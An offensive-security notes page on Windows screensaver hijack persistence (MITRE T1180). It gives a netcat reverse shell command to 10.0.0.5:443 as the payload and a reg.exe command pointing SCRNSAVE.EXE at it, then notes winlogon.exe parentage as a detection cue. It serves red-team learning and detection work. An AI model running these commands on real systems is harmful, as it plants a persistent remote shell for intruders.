> For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.ired.team/offensive-security/persistence/t1180-screensaver-hijack.md).

# Screensaver Hijack

## Execution

To achieve persistence, the attacker can modify `SCRNSAVE.EXE` value in the registry  `HKCU\Control Panel\Desktop\` and change its data to point to any malicious file.&#x20;

In this test, I will use a netcat reverse shell as my malicious payload:

{% code title="c:\shell.cmd\@victim" %}

```csharp
C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
```

{% endcode %}

Let's update the registry:

![](/files/-LJ3FfrqwTiqdXKoj0if)

The same could be achieved using a native Windows binary reg.exe:

{% code title="attacker\@victim" %}

```bash
reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d c:\shell.cmd
```

{% endcode %}

![](/files/-LJ3HryqjxDQX3gMPmez)

## Observations

Note the process ancestry on the victim system - the reverse shell process traces back to winlogon.exe as the parent process, which is responsible for managing user logons/logoffs. This is highly suspect and should warrant a further investigation:

![](/files/-LJ3FmqTrOH0Vm4yfjik)

![](/files/-LJ3NAYVyAx90FHdqEBg)

## References

{% embed url="<https://attack.mitre.org/wiki/Technique/T1180>" %}
